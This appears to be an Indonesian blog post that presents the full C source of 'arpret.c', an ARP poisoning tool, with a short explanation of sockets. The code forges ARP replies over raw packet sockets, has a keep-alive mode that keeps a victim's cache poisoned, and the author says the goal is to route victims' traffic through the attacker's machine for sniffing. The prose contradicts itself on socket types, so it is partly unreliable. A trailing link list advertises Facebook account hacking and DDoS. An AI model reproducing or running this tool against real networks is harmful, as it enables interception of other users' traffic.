Socket Programming untuk ARP Poisoning

Socket Programming adalah protokol yang mempunyai metode untuk membuat koneksi antar antara perangkat dalam jaringan. Terdapat dua tipe socket yang paling sering digunakan yaitu “Stream Socket” dan “Datagram Socket” yang lebih dikenal dengan “SOCK_STREAM” and “SOCK_DGRAM”. Datagram Socket disebut dengan “Connectionless socket” sedangkan Stream Socket lebih reliable dibandingkan Datagram Socket karena terciptanya komunikasi dua arah yang memungkinkan kecilnya data error pada saat transmisi data.
Hati-hati ye,, Socket !, Bukan yang lain,,!?!.. Berikut ini adalah script arpret.c yang ane rakit jungkar balik untuk ARP Poisoning dengan menggunakan pustaka socket :
Code:

#include "arpreply.h"

void usage() {

printf("[+] arpret -i -s -S -D -k -f\n\n");
printf("[+] -f untuk memperbaiki MAC address\n");
printf("[+] -k2 untuk membuat host tetap teracuni selama proses (arp/2 sec)\n");
exit(0);
}

void signalHandler(int signal) {
int bytes_sent = 0; char date[64];

if(fix_arp == 0 || fixing_mac == NULL) { printf("[+] PERHATIAN .. MAC address host belum kembali seperti semula!!\n"); exit(0); }

printf("[+] FIXING HOST(S) WITH: %s\n", fixing_mac);

printf("[*] Sending arp reply (FIX)...\n");
bytes_sent = sendReply(iface, master_src_ip, fixing_mac, master_dest_ip, master_dest_mac);

if (bytes_sent <= 0) { printf("[-] Unable to send reply!\n"); goto cleanup; } printf("[*] Sent %d bytes (FIX).\n", bytes_sent); cleanup: exit(0); } int main(int argc, char **argv) { int bytes_sent = 0; int err = 0; int sock = 0; int ksec = 1000; int is_keep_alive = 0; int ok_count = 0; time_t prev_time; time_t now_time; time_t raw_t; struct tm *timeinfo; char date[64]; char *src_ip = NULL; char *dest_ip = NULL; char *src_mac = NULL; char *dest_mac = NULL; if(getuid()) { printf("[-] Harus menggunakan akun Root.\n"); return -1; } time(&prev_time); time(&now_time); printf("[+] Penggunaan\n"); opterr = 0; int option = 1; while((option = getopt(argc, argv, "i:vs:S:d:D:k:f:?")) != -1 ) { switch(option) { case 'i': iface = optarg; printf("[+] Using: %s ", iface); if(if_nametoindex(iface) == 0) { printf(" => NOT GOOD!\n"); goto cleanup; }
printf("OK.\n"); ok_count++;

break;
case 's':
master_src_ip = optarg; ok_count++;
printf("[+] Source IP: %s\n", master_src_ip);
break;
case 'S':
master_src_mac = optarg; ok_count++;
printf("[+] Source MAC: %s\n", master_src_mac);
break;
case 'd':
master_dest_ip = optarg; ok_count++;
printf("[+] Dest IP: %s\n", master_dest_ip);
break;
case 'D':
master_dest_mac = optarg; ok_count++;
printf("[+] Dest MAC: %s\n", master_dest_mac);
break;
case 'k':
ksec = atoi(optarg); is_keep_alive = 1;
printf("[+] Keep-alive set at %d (seconds).\n", ksec);
break;
case 'v':
is_verbose = 1;
printf("[+] Vebosity is ON\n");
break;
case 'f':
fixing_mac = optarg; fix_arp = 1;
printf("[+] FIX (%s) is set to %d (0=OFF, 1=ON(Default))\n", fixing_mac, fix_arp);
break;
}

}
if(ok_count < 5) { usage(); } if(is_verbose == 1) { printf("[+] Configuration ok\n"); } if(fix_arp != 0 && signal(SIGINT, signalHandler) == SIG_IGN) { printf("[+] Signal handlers are attached..\n"); signal (SIGINT, SIG_IGN); } if(is_verbose == 1) { printf("[+] Beginning attack now.\n"); } if(is_keep_alive == 1) { while(1) { time(&raw_t); timeinfo = localtime(&raw_t); memset(date, 0x0, 64); strftime(date, 63, "%c", timeinfo); printf("[*] (%s) Sending arp reply...\n", date); bytes_sent = sendReply(iface, master_src_ip, master_src_mac, master_dest_ip, master_dest_mac); if (bytes_sent <= 0) { printf("[-] Unable to send reply!\n"); goto cleanup; } printf("[*] (%s) Sent %d bytes.\n", date, bytes_sent); sleep(ksec); } } else { printf("[*] (%s) Sending arp reply....\n", date); bytes_sent = sendReply(iface, master_src_ip, master_src_mac, master_dest_ip, master_dest_mac); if (bytes_sent <= 0) { printf("[-] Unable to send reply!\n"); goto cleanup; } printf("[*] (%s) Sent %d bytes.\n", date, bytes_sent); } cleanup: close(sock); return 0; } int sendReply(char *iface, char *src_ip, char *src_mac, char *dest_ip, char *dest_mac) { int bytes_sent = 0; int err = 0; int sock = 0; int ksec = 1000; int is_verbose = 0; int iface_num = 0; time_t prev_time; time_t now_time; time_t raw_t; struct tm *timeinfo; struct sockaddr_ll sa; struct ethernet_header eth_hdr; struct arp_header arp_hdr; char date[64]; iface_num = if_nametoindex(iface); if(iface_num == 0) { printf("[-] IFACE %s IS REPORTED DOWN -> trying anyway.!\n", iface); }

memset((void *)&eth_hdr, 0x0, sizeof(struct ethernet_header));
memset(&arp_hdr, 0x0, sizeof(struct arp_header));

sock = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
if (sock < 0) { printf("[-] Unable to open a socket!?\n"); return -1; }

sa.sll_family = AF_PACKET;
sa.sll_protocol = htons(ETH_P_IP);

sa.sll_ifindex = iface_num;
sa.sll_hatype = ARPHRD_ETHER;
sa.sll_pkttype = 0x01;
sa.sll_halen = ETH_ALEN;

eth_hdr.proto = htons(0x0806);
arp_hdr.hdw_type = htons(0x0001);
arp_hdr.proto = htons(0x0800);
arp_hdr.hdw_size = 0x06;
arp_hdr.proto_size = 0x04;
arp_hdr.opcode = htons(0x02);

memcpy(&eth_hdr.d_mac, ether_aton(dest_mac), 6);
memcpy(&eth_hdr.s_mac, ether_aton(src_mac), 6);

memcpy(&arp_hdr.mac_saddr, (unsigned char *)ether_aton(src_mac), 6);
*(unsigned long *) arp_hdr.saddr = inet_addr(src_ip);

memcpy(&arp_hdr.mac_daddr, (unsigned char *)ether_aton(dest_mac), 6);
*(unsigned long *) arp_hdr.daddr = inet_addr(dest_ip);

if(is_verbose ==1 ) { printf("[+] Buliding payload...\n"); }
memcpy(packet, &eth_hdr, sizeof(struct ethernet_header));
memcpy(packet+sizeof(struct ethernet_header), &arp_hdr, sizeof(struct arp_header));

int len = sizeof(struct ethernet_header) + sizeof(struct arp_header);

if(is_verbose == 1) { printf("[+] Sending now.\n"); }
bytes_sent = sendto(sock, packet, len, 0, (struct sockaddr*) &sa, sizeof(sa));
if (bytes_sent <= 0) { printf("[-] Unable to send reply!\n"); return -1; }
if(is_verbose == 1) { printf("[+] SENT\n"); }

cleanup:
return bytes_sent;
}

Skrip arpret.c dibuat dengan menggunakan tipe Datagram Socket. Datagram socket juga menggunakan IP untuk routing paket, tapi tidak menggunakan TCP tapi menggunakan “User Datagram Protocol atau “UDP”.
Pada Datagram Socket tidak bisa menjaga koneksi secara terus-menerus, Data Socket hanya membangun paket, tentukan IP header berikut dengan informasi tujuan, dan kirim paket tanpa membuat koneksi seperti pada TCP. Biasanya Datagram Socket biasa digunakan pada aplikasi tftp (versi pertama dari FTP), dhcpd atau dhcp client, multiplayer games, streaming audio, video conferencing, dan lain-lain. Skrip arpret.c merupakan implementasi dari socket programming pada sistem operasi UNIX, BSD, dan keluarga Linux.


Skrip arpret.c adalah alat bantu untuk membuat sebuah arp reply palsu (fake arp reply) kepada komputer target, dengan tujuan mengelabuhi arp cache pada komputer korban agar setiap paket yang masuk dan keluar ke komputer target bisa peneliti alihkan terlebih dahulu ke komputer kita. Pada saat ini skrip arpret.c hanya bisa di jalankan di sistem operasi unix, BSD, dan keluarga Linux.


Skrip ini tidak menggunakan dua tipe “SOCK_STREAM” and “SOCK_DGRAM” tapi menggunakan tipe “SOCK_RAW”. SOCK_RAW dipilih karena peneliti bisa menentukan sendiri isi header paket seperti Ethernet, IP, TCP dan lain-lain. Lalu meng-injeksi paket dengan header yang sudah dimodifikasi lalu mengirimkannya ke tujuan selain itu SOCK_RAW mendukung packet filtering. PF_PACKET adalah software interface untuk mengirim atau menerima paket data pada lapisan 2 dari OSI, dan setiap paket yang sudah dimodifikasi headernya langsung dikirimkan. Skrip ini bekerja pada PF_PACKET interface untuk menciptakan raw sockets dan menggunakan protokol ETH_P_ALL untuk IP network. Implementasinya berada pada skrip arpret.c baris
sock = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
biar lebih jelas ane kasih gambarannya pake flowchart :

http://logsmylife.files.wordpress.co.../flowchart.png

Program arpret.c sukses mengirim arp reply palsu hanya dalam satu kali pengiriman, tapi terdapat masalah dalam skrip tersebut yaitu pengiriman arp reply secara simultan. Opsi -k2 adalah mengharuskan program tersebut terus-menerus mengirim arp reply. Karena setiap sistem operasi akan memperbaharui arp cache setiap jangka waktu tertentu sesuai sistem operasi. Nah saat cache arp pada komputer korban,, ente sekalian bisa menangkap aliran data yang lewat dikomputer juragan, diintip-intiplah pake ape gitu,, semacam sniffer,, masa kaga tau dah.. wkakak..


http://logsmylife.wordpress.com/2010...arp-poisoning/


References :

Jon Erickson. Hacking : The Art of Exploitation. No Starch Press; 2003.
Robert Wagner, Jeff Bryner. Address Resolution Protocol. SANS Institute; 2006.
Brian “Beej Jorgensen” Hall. Beej’s Guide to Network programming – Using Internet Sockets. 2009.
Mixter . A brief programming tutorial in C for raw sockets. http://mixter.void.ru/rawip.html

Artikel Terkait:

Hacking

• Membuat Akun Megaupload Premium
• Mediafire auto Downloader [ Working]
• Software Yang Sering di Gunakan Hacker
• Hacker Evolution Untold | Game Simulasi Hacker
• Add Ons Untuk Preview Link Sebelum Di Klik
• Tips Membuat Daftar File Di Dalam Folder
• Cara Mendapatkan Password Facebook | Hack Facebook
• Tutorial Cara Patch Software
• Merubah Tampilan XP seperti Windows 7
• Windows Admin Hack
• Menghilangkan Pesan Windows Is Not Genuine Di Windows 7
• Tools Simpel Untuk Pencurian Data Flash Disk
• Implementasi Facebook Hacking Dengan Dictionary Attack Bruteforce
• Matikan Komputer Windows dengan E-Mail
• 4 Tools Gratis Mengembalikan File yang Terhapus
• Hacking Skype untuk rendering kwalitas tinggi (CM112)
• DOOMSDAY 2012 - Mimpi Buruk Antivirus Lokal
• 6 Tools Untuk Menganalisa Web Host
• Flashdisk, senjata mungil para Hacker
• Pembajakan Account Facebook dan Cara Mencegahnya
• Analysis And Identification Attacks On Your Website
• Exploitasi Social Enginering
• DOS & DDOS ala Cracker
• Mengembalikan Account Facebook Yang Dibobol